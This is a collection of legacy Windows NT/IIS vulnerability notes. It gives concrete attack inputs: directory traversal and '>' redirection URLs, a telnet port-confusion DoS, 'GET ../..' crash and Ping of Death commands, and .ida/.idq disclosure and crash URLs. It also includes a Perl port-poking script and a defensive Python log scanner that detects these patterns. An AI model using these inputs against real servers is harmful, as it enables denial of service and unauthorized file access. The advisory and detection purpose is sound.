Affected systems: 4.0, IIS 1.0
A URL such as 'http://www.domain.com/..\..' allows you to browse and download files outside of the webserver content root directory.
A URL such as 'http://www.domain.com/scripts..\..\scriptname' allows you to execute the target script.

By default user 'Guest' or IUSR_WWW has read access to all files on an NT disk. These files can be browsed, executed or downloaded by wandering guests.

--------------------------------------------------------------------

Affected systems: 4.0
A URL such as http://www.domain.com/scripts/exploit.bat>PATH\target.bat will create a file 'target.bat'.
If the file 'target.bat' exists, the file will be truncated.

A URL such as http://www.domain.com/scripts/script_name%0A%0D>PATH\target.bat will create an output file 'target.bat'.

----------------------------------------------------------------------

Affected systems: 3.51, 4.0
Multiple service ports (53, 135, 1031) are vulnerable to 'confusion'.

The following steps:

    Telnet to an NT 4.0 system on port 135
    Type about 10 characters followed by a <CR>
    Exit Telnet

result in a target host CPU utilization of 100%, though at a lower priority than the desktop shell. Multiple services which are confused can result in a locked system.

When launched against port 135, NT Task Manager on the target host shows RPCSS.EXE using more than usual process time. To clear this the system must be rebooted.

The above also works on port 1031 (inetinfo.exe), where IIS services must be restarted.

If a DNS server is running on the system, this attack against port 53 (dns.exe) will cause DNS to stop functioning.

The following is a modified Perl script, gleaned from postings in the NTsecurity@iss.net list, to test ports on your system (Perl is available from the NT resource kit):
/*begin poke code*/

use strict;
use warnings;
use IO::Socket::INET;   # core Perl; the old chat2.pl library is no longer shipped

my $systemname = shift @ARGV or die "usage: perl poke servername\n";

my $verbose    = 1;   # tell me what you're hitting
my $knownports = 1;   # don't hit known problem ports (53, 135, 1031)

# Port 0 is not a valid TCP port, so start at 1.
for (my $port = 1; $port < 65535; $port++) {
    if ($knownports && ($port == 53 || $port == 135 || $port == 1031)) {
        next;
    }
    print "Trying port: $port\n" if $verbose;

    # Connect, send the test string and close; skip ports that refuse the connection.
    my $fh = IO::Socket::INET->new(
        PeerAddr => $systemname,
        PeerPort => $port,
        Proto    => 'tcp',
        Timeout  => 2,
    ) or next;
    print $fh "This is about ten characters or more\n";
    close($fh);
}

/*end poke code*/

Save the above text as c:\perl\bin\poke and run it like this: C:\perl\bin> perl poke servername

--------------------------------------------------------------------------------

Affected systems: 4.0
Using a telnet application to get to a webserver via HTTP port 80, and typing "GET ../.." <cr> will crash IIS.

This attack causes Dr. Watson to display an alert window and to log an error:

"The application, exe\inetinfo.dbg, generated an application error The error occurred on date@ time The exception generated was c0000005 at address 53984655 (TCP_AUTHENT::TCP_AUTHENT"

--------------------------------------------------------------------------------
Affected systems: 3.51, 4.0
Large packet pings (PING -l 65527 -s 1 hostname), otherwise known as 'Ping of Death', can cause a blue screen of death on 3.51 systems:

STOP: 0x0000001E
KMODE_EXCEPTION_NOT_HANDLED - TCPIP.SYS

-OR-

STOP: 0x0000000A
IRQL_NOT_LESS_OR_EQUAL - TCPIP.SYS

NT 4.0 is vulnerable when sending large packets, but does not crash on receiving large packets.

--------------------------------------------------------------------------------
Microsoft IIS 5.0 has problems handling a specific form of URL ending with "ida". The problem can have two kinds of results. One possible outcome is that the server responds with a message like "URL String too long", "Cannot find the specified path" or the like. The other possible result is that the server terminates with an "Access Violation" message (effectively causing a Denial of Service attack against the server). Vulnerable are all IIS versions (up to and including IIS 5.0).

When a remote attacker issues a request with the malformed URL http://www.example.com/...[25kb of '.']...ida, the server will either crash (causing an effective DoS attack) or report its current directory location (revealing the directory structure).

--------------------------------------------------------

IIS, Microsoft's Internet Information Server, can be used to reveal the true path of the files (where they physically reside on the local hard drive) by requesting a non-existing file with an IDQ/IDA extension. By requesting a URL such as http://www.microsoft.com/anything.ida or http://www.microsoft.com/anything.idq, a remote user will get a response that looks like:

'The IDQ d:\http\anything.idq could not be found'

Such a response allows him to gain further knowledge on how the web site is organized and the directory structure of the server.
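The request patterns collected on this page (the '..\..' traversal, the '>' output redirection with %0A%0D in the URL, and the .ida/.idq probes and very long 'ida' URLs) all leave a trace in the web server's access log. The following Python script is an added example written for this page, not code from the original post: it assumes W3C-style IIS log fields (date, time, client IP, method, URI stem, URI query, status), percent-decodes each request before matching so that encoded variants such as %5c for '\' are caught as well (a generalisation beyond the literal URLs above), and uses a constructed sample log plus an assumed 1024-byte length threshold for the long 'ida' case.

```python
"""Flag the request patterns described on this page in IIS-style access log lines.

Constructed example for this page (not code from the original post). Assumes
W3C-extended-style fields "date time c-ip cs-method cs-uri-stem cs-uri-query sc-status"
and a 1024-byte path length threshold, both chosen here for illustration.
"""
import re
from urllib.parse import unquote

LONG_PATH_THRESHOLD = 1024  # assumed; the page describes ~25 KB of '.' before "ida"

# Patterns checked against the percent-decoded request path.
TRAVERSAL_RE = re.compile(r"\.\.[\\/]")        # '..\' or '../' (the '..\..' and 'GET ../..' cases)
REDIRECT_RE = re.compile(r">")                 # shell redirection appended to a script name
CTRL_RE = re.compile(r"[\r\n]")                # %0A / %0D embedded in the URL
IDQ_IDA_RE = re.compile(r"\.id[aq]$", re.I)    # .ida / .idq path-disclosure probe

# Constructed sample log (W3C-style fields, no real hosts).
SAMPLE_LOG = """\
1999-01-01 10:00:00 10.0.0.5 GET /index.htm - 200
1999-01-01 10:00:01 10.0.0.5 GET /..\\..\\somefile.txt - 200
1999-01-01 10:00:02 10.0.0.6 GET /scripts/..%5c..%5cscriptname - 200
1999-01-01 10:00:03 10.0.0.7 GET /scripts/exploit.bat>c:\\target.bat - 502
1999-01-01 10:00:04 10.0.0.7 GET /scripts/script_name%0A%0D>c:\\target.bat - 502
1999-01-01 10:00:05 10.0.0.8 GET /anything.idq - 404
1999-01-01 10:00:06 10.0.0.9 GET /{dots}ida - 500
1999-01-01 10:00:07 10.0.0.5 GET /products/list.asp - 200
""".format(dots="." * 3000)


def classify_request(uri_stem: str, uri_query: str = "-") -> list[str]:
    """Return the names of every suspicious pattern present in one request."""
    raw = uri_stem if uri_query in ("", "-") else f"{uri_stem}?{uri_query}"
    decoded = unquote(raw)  # normalise %5c, %2e, %0A etc. before matching
    findings = []
    if TRAVERSAL_RE.search(decoded):
        findings.append("path-traversal")
    if REDIRECT_RE.search(decoded):
        findings.append("output-redirection")
    if CTRL_RE.search(decoded):
        findings.append("crlf-in-url")
    if IDQ_IDA_RE.search(decoded):
        findings.append("idq-ida-probe")
    if len(decoded) > LONG_PATH_THRESHOLD and decoded.lower().endswith("ida"):
        findings.append("long-ida-url")
    return findings


def scan_log(text: str) -> list[tuple[int, str, list[str]]]:
    """Return (line number, client IP, findings) for each log line that trips a rule."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        fields = line.split()
        if line.startswith("#") or len(fields) < 6:
            continue  # skip directive/header lines and malformed records
        client_ip, uri_stem, uri_query = fields[2], fields[4], fields[5]
        findings = classify_request(uri_stem, uri_query)
        if findings:
            hits.append((lineno, client_ip, findings))
    return hits


if __name__ == "__main__":
    for lineno, ip, findings in scan_log(SAMPLE_LOG):
        print(f"line {lineno}: {ip}: {', '.join(findings)}")
```

Decoding before matching matters because IIS resolved the encoded forms the same way it resolved the literal ones, so a rule that only looks for the literal '..\' misses requests that arrive as '..%5c'. The length threshold is deliberately low for the sample; on a real server it can be raised to whatever the longest legitimate path is.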